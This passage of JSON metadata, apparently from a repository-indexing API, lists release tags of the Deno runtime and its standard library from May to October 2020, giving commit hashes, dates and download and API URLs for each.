s_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.5